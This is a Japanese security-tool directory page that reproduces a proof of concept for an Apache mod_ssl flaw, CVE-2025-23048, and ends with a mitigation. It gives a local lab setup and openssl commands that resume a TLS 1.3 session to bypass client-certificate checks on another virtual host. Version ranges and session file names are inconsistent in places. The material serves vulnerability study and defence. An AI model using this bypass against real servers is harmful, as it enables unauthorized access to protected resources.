Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-23048-POC — Apache HTTP Server バージョン 2.4.35 – 2.4.63 は、異なる `SSLCACertificateFile` ディレクティブを持つ仮想ホスト間で TLS 1.3 セッション再開が使用される場合、クライアント証明書認証バイパスに対して脆弱です。 | Kitploit
ツール/GitHubGitHub/absholi7ly/cve-2025-23048-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証
GitHubabsholi7ly/cve-2025-23048-poc

CVE-2025-23048-POC

Apache HTTP Server バージョン 2.4.35 – 2.4.63 は、異なる `SSLCACertificateFile` ディレクティブを持つ仮想ホスト間で TLS 1.3 セッション再開が使用される場合、クライアント証明書認証バイパスに対して脆弱です。

リポジトリを見る
410ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-23048: Apache mod_ssl TLS 1.3 セッションレジュームにおけるクライアント証明書バイパス

Apache HTTP Server バージョン 2.4.35 から 2.4.62 は、異なる SSLCACertificateFile ディレクティブを持つ仮想ホスト間で TLS 1.3 セッションレジュームが使用された場合、クライアント証明書認証のバイパスに対して脆弱です。

攻撃者は、ある仮想ホストで有効なクライアント証明書を保持している場合、別のCAによって発行された証明書を必要とする別の仮想ホスト上で TLS 1.3 セッションを再開し、保護されたリソースへの不正アクセスを得ることができます。


テスト環境

  • Apache HTTP Server: 2.4.57 (Win64)
  • オペレーティングシステム: Windows 10 (64-bit)

サーバーセットアップ

1. Apache 2.4.57 (Win64) のインストール

root@kitploit:~
# ダウンロード元: https://www.apachelounge.com/download/VS16/binaries/httpd-2.4.57-win64-VS16.zip
# C:\Apache24 に展開する

2. conf\httpd.conf で必要なモジュールを有効化

root@kitploit:~
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
LoadModule ssl_module modules/mod_ssl.so

3. SSL セッションキャッシュの設定

root@kitploit:~
SSLSessionCache "shmcb:C:/Apache24/logs/ssl_scache(512000)"
SSLSessionCacheTimeout 300
SSLSessionTickets on

4. SSL ディレクトリの作成と証明書の生成

root@kitploit:~
cd C:\Apache24\conf
mkdir ssl
cd ssl

# サーバー証明書(自己署名)
openssl req -x509 -newkey rsa:2048 -keyout server.key -out server.crt -days 365 -nodes -subj "/CN=localhost"

# CA1 と vhost1 用クライアント証明書
openssl req -x509 -newkey rsa:2048 -keyout ca1.key -out ca1.pem -days 365 -nodes -subj "/CN=CA1"
openssl req -newkey rsa:2048 -keyout client_ca1.key -out client_ca1.csr -nodes -subj "/CN=Client1"
openssl x509 -req -in client_ca1.csr -CA ca1.pem -CAkey ca1.key -CAcreateserial -out client_ca1.crt -days 365

# vhost2 用 CA2
openssl req -x509 -newkey rsa:2048 -keyout ca2.key -out ca2.pem -days 365 -nodes -subj "/CN=CA2"

# クリーンアップ
del client_ca1.csr *.srl

5. 仮想ホストの設定(conf\extra\httpd-vhosts.conf)

root@kitploit:~
<VirtualHost *:443>
    ServerName vhost1.example.com
    DocumentRoot "C:/Apache24/htdocs/vhost1"
    SSLEngine on
    SSLCertificateFile "C:/Apache24/conf/ssl/server.crt"
    SSLCertificateKeyFile "C:/Apache24/conf/ssl/server.key"
    SSLCACertificateFile "C:/Apache24/conf/ssl/ca1.pem"
    SSLVerifyClient optional
    SSLVerifyDepth 1
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 -TLSv1.2
    SSLStrictSNIVHostCheck off

    <Location />
        Require ssl-verify-client
    </Location>
</VirtualHost>

<VirtualHost *:443>
    ServerName vhost2.example.com
    DocumentRoot "C:/Apache24/htdocs/vhost2"
    SSLEngine on
    SSLCertificateFile "C:/Apache24/conf/ssl/server.crt"
    SSLCertificateKeyFile "C:/Apache24/conf/ssl/server.key"
    SSLCACertificateFile "C:/Apache24/conf/ssl/ca2.pem"

    SSLVerifyClient optional_no_ca
    SSLVerifyDepth 1
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 -TLSv1.2
    SSLStrictSNIVHostCheck off

    <Location /restricted>
        Require valid-user
    </Location>
</VirtualHost>

6. 保護コンテンツの作成

root@kitploit:~
mkdir C:\Apache24\htdocs\vhost1
echo <html><body>Vhost1: Accessible with CA1</body></html> > C:\Apache24\htdocs\vhost1\index.html

mkdir C:\Apache24\htdocs\vhost2\restricted
echo <html><body>Restricted: Vhost2 Secret!</body></html> > C:\Apache24\htdocs\vhost2\restricted\index.html

7. Apache の起動

root@kitploit:~
C:\Apache24\bin>httpd.exe -k install
C:\Apache24\bin>httpd.exe -k start

概念実証

ステップ 1: vhost1 とのフルハンドシェイク → セッションを保存

root@kitploit:~
openssl s_client -servername vhost1.example.com -tls1_3 -cert "C:\Apache24\conf\ssl\client_ca1.crt" -key "C:\Apache24\conf\ssl\client_ca1.key" -CAfile "C:\Apache24\conf\ssl\server.crt" -sess_out session_v1.pem 127.0.0.1:443

接続後に入力:

root@kitploit:~
GET / HTTP/1.1
Host: vhost1.example.com

Apache

期待される出力(抜粋):

root@kitploit:~
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
...
Post-Handshake New Session Ticket arrived:
...
HTTP/1.1 200 OK
...
<html><body>Vhost1: Accessible with CA1</body></html>

セッションチケットは session_shared.pem に保存されます。


ステップ 2: vhost2 でセッションを再開 → 保護されたパスへアクセス

root@kitploit:~
openssl s_client -servername vhost2.example.com -tls1_3 -CAfile "C:\Apache24\conf\ssl\server.crt" -sess_in session_v1.pem 127.0.0.1:443

入力:

root@kitploit:~
GET /restricted/ HTTP/1.1
Host: vhost2.example.com

期待される出力(重要):

root@kitploit:~
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Resumption PSK: ...
    TLS session ticket lifetime hint: 300 (seconds)
...
HTTP/1.1 200 OK
...
<html><body>Restricted: Vhost2 Secret!</body></html>

Apache

CA1 のクライアント証明書が vhost2(CA2 のみを信頼)で受け入れられました
再認証は発生しませんでした — セッションレジュームにより CA チェックがバイパスされました


緩和策

root@kitploit:~
SSLStrictSNIVHostCheck on

をすべての異なるクライアント CA を必要とする TLS 1.3 仮想ホストで設定します。

クロス SNI セッションレジュームを無効化し、バイパスを防ぎます。


ツールをダウンロード